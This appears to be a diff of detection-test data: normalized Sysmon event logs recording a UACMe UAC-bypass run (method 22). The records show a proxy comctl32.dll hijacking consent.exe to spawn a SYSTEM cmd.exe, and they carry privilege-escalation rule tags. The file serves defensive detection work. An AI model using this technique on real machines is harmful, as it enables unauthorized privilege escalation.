AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC3D0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00107a250601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7472", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.760Z", "type": "raw", "uuid": "4358e286-1ee5-4521-af33-0ede7dac5ef4" } -{ "action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8183818Z\"},\"EventRecordID\":\"5438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - UAC Bypass UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.721\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\comctl32.dll\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-08-03 12:08:13.721\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - UAC Bypass UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\temp\\comctl32.dll", "object.name": "comctl32.dll", "object.path": "c:\\users\\ieuser\\appdata\\local\\temp\\", "object.property": "creation time", "object.value": "2019-08-03T12:08:13.721Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\explorer.exe", "subject.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "subject.process.id": "5336", "subject.process.name": "explorer.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.721Z", "type": "raw", "uuid": "114bdb77-3e56-4e56-91f1-c348231ab6e7" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.6360892Z\"},\"EventRecordID\":\"5437\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.624\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.9.1905\"},{\"Name\":\"Description\",\"text\":\"UACMe main module\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"CommandLine\",\"text\":\"UACME.exe 22\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9E57914D39FBFE785C915E225011892613C4714C,MD5=D57E778DF10F801F47119A04BE990FFD,SHA256=D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378,IMPHASH=B6789EDFE23DDA911AE37C87444D3DCB\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5a29-5d45-0000-0010deb99000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5780\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "UACME.exe 22", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.hash.imphash": "B6789EDFE23DDA911AE37C87444D3DCB", "object.process.hash.md5": "D57E778DF10F801F47119A04BE990FFD", "object.process.hash.sha1": "9E57914D39FBFE785C915E225011892613C4714C", "object.process.hash.sha256": "D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378", "object.process.id": "5336", "object.process.meta": "Description:UACMe main module | Product:UACMe | Company:Hazardous Environments", "object.process.name": "uacme.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-5a29-5d45-0000-0010deb99000", "object.process.parent.id": "5780", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "3.1.9.1905", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.624Z", "type": "raw", "uuid": "a82cad3b-7c34-44ff-afea-535b46c1e49e" } +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:55.4089224Z\"},\"EventRecordID\":\"5455\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:55.376\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7957-5d45-0000-00100e620a01}\"},{\"Name\":\"ProcessId\",\"text\":\"3116\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BCAF0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BCAF0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7957-5d45-0000-00100e620a01", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "3116", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:55.376Z", "type": "raw", "uuid": "307840cf-68d8-4456-803b-09d028088acc"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5551743Z\"},\"EventRecordID\":\"5453\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.377\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"SourceProcessId\",\"text\":\"7564\"},{\"Name\":\"SourceThreadId\",\"text\":\"7188\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\consent.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4192\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+47241|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+46196|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+48f07|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44865|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44648|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44672|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+d62ca|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+c3879|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+756c3|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+7566e\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "7188", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\Windows\\SYSTEM32\\ntdll.dll+48f07|C:\\Windows\\SYSTEM32\\ntdll.dll+44865|C:\\Windows\\SYSTEM32\\ntdll.dll+44648|C:\\Windows\\SYSTEM32\\ntdll.dll+44672|C:\\Windows\\SYSTEM32\\ntdll.dll+d62ca|C:\\Windows\\SYSTEM32\\ntdll.dll+c3879|C:\\Windows\\SYSTEM32\\ntdll.dll+756c3|C:\\Windows\\SYSTEM32\\ntdll.dll+7566e", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.id": "4192", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.377Z", "type": "raw", "uuid": "6495c614-7815-48db-b001-15f7a3b97059"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5547781Z\"},\"EventRecordID\":\"5452\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.391\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"ProcessId\",\"text\":\"4192\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4192", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.391Z", "type": "raw", "uuid": "32c28c58-c00a-498a-9029-76636a5f0bb7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5243142Z\"},\"EventRecordID\":\"5451\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.363\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": 